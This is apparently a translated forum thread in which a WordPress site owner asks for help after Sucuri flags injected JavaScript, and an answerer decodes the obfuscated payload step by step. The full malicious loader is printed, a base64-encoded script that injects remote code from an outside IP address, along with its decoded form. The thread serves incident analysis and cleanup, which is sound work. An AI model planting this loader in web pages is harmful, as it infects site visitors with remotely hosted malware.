it-swarm.com.de

Sucuri erkennt Malware auf wordpress, aber ich kann den Schadcode nicht finden

Gestern habe ich einen Bericht erhalten, in dem wir gebeten wurden, eine wordpress Website zu überprüfen, da das Antivirenprogramm der Person dieses Web blockiert hat.

Ich habe den Sucuri Site Check durchgeführt und er erkennt tatsächlich Malware:

"Bekannte Javascript-Malware: malware.injection? 39"

<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->

Ich habe das Web deaktiviert und den gesamten Quellcode heruntergeladen. Aber wenn ich versuche, nach dem Schadcode zu suchen ... kann ich nichts finden. Ich suche in allen Dateien und kann nichts erkennen.

Was kann ich machen? Jede Hilfe wäre dankbar.

9
amagali

Die betreffende Malware wird an anderer Stelle gehostet und (wahrscheinlich) durch Cross-Site-Scripting (XSS) hinzugefügt. Wenn Sie sich den Teil "var src" ansehen, sehen Sie eine lange Zeichenfolge von Base64-codiertem Text:

ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=

Bei der Dekodierung stellt sich Folgendes heraus:

document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%31%39%33%2E%32%33%38%2E%34%36%2E%35%37%2F%6D%52%50%50%7A%43%22%3E%3C%2F%73%63%72%69%70%74%3E'));

document.write Fügt den angegebenen Code zum DOM hinzu. Das URL-Dekodieren des Teils in "unescape" führt zu folgendem Skript-Tag (Leerzeichen hinzugefügt, um es zu unterbrechen):

<script src="http://193.238.46.57/            mRPPzC"></script>

Daher wird die Malware wahrscheinlich unter DIESER URL gehostet (was auch immer es ist) und über den Befehl document.write In die Seite eingefügt.


Eine Kurzanleitung, wie ich das gemacht habe

  1. Installieren Sie Notepad ++.
  2. Stellen Sie sicher, dass das Mime-Tools-Plugin installiert ist (möglicherweise standardmäßig?)
  3. Kopieren Sie die Base64-codierte Zeichenfolge in eine neue Datei und wählen Sie den Text aus.
  4. Wählen Sie unter "Plugins" "MIME Tools" -> Base 64 Decode
  5. Kopieren Sie das Teil in Unescape und fügen Sie es in eine neue Zeile ein
  6. Wählen Sie die neue Zeile aus und wählen Sie dann "Plugins" -> MIME Tools -> URL Decode
15
Philip Rowlands